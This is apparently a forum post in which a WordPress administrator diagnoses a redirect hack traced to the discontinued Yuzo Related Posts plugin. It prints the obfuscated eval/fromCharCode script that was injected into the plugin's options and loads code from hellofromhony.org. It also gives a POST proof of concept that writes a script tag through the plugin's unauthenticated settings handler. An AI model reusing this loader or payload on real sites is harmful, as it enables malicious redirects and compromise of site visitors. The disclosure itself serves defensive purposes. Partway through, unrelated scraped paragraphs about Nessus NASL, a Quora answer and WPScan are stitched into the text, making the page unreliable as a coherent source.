About an hour ago a Wordpress Page I manage started redirecting to Ad/Malware Pages.
I found the source of the redirection, want to provide help for others affected and need help finding the actual vulnerability and/or a fix.
The redirection happens after the Site is done loading, so I was looking for a JavaScript Snippet in the Page and dubious redirections in the Network Analyzer. Obvious malicious redirects were: hellofromhony.org, thebiggestfavoritemake.com, nnatrevaleur.tk and a site trying to snatch my current location (could not reproduce that one more than once though).
I was able to trace the redirections down to coming from https://hellofromhony.org/counter which is embedded via a code snippet.
The snippet was embedded in wp_options in an entry with the key 'yuzo_related_post_options' - more specifically embedded in the json option 'yuzo_related_post_css_and_style' of the option_value. That option gets echoed without sanitizing.
This option is part of the Yuzo Related Posts Plugin, which got discontinued about a week ago: https://wordpress.org/plugins/yuzo-related-post/
Removing that Plugin stopped the redirection immediately, I was not able to find other traces of tampering with the site.
The snippet that was in the option_value:
</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));</script>
While removing the Plugin poses a quickfix, I want to dive deeper to be sure that there was no access to the database, backend and webspace.
These programs are named plugins and are written in the Nessus Attack Scripting Language (NASL). The plugins contain vulnerability information, a simplified set of remediation actions and the algorithm to test for the presence of the security issue.
Are inactive WordPress plugins a security risk? - Quora. Yes! Obsolete themes and outdate plugins are a huge security risk for WordPress users and rank up among the top 10 reasons why WP sites are hacked. Hackers are always looking for WP weaknesses.
Use a site like WPScan Vulnerability Database to search for the plugin name and see if any results come up that indicate the plugin is vulnerable. This service lists plugins and known vulnerabilities. You can check the database by using the plugin name or filter through all the vulnerabilities.
I do believe I just found it: The Yuzo Related Posts Plugin does not check for authentication when saving options.
So POSTing
yuzo_related_post_css_and_style=</style><script+language=javascript>alert('hacked');</script> 
to /wp-admin/options-general.php?page=yuzo-related-post will succeed, even if you're not logged in.
The Plugin is using is_admin() to check for authentication, but that is a "false friend" and only checks if the accessed page is in the admin-area, not if a user is authenticated (nor authorized). See the Wordpress documentation.
A quick solution to keep using the plugin is just removing the settings option by putting false in the if-Statement in /assets/functions/options.php line 1155:
    function __construct(){
        global $if_utils;
        $this->utils = $if_utils;
        if(false/* is_admin() */)
            self::configuration_plugin();
        else
            self::parameters();
    }
Update:
Hang Guan pointed to a Blog Post about this issue from last week, seems like it is "out in the wild" now.
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With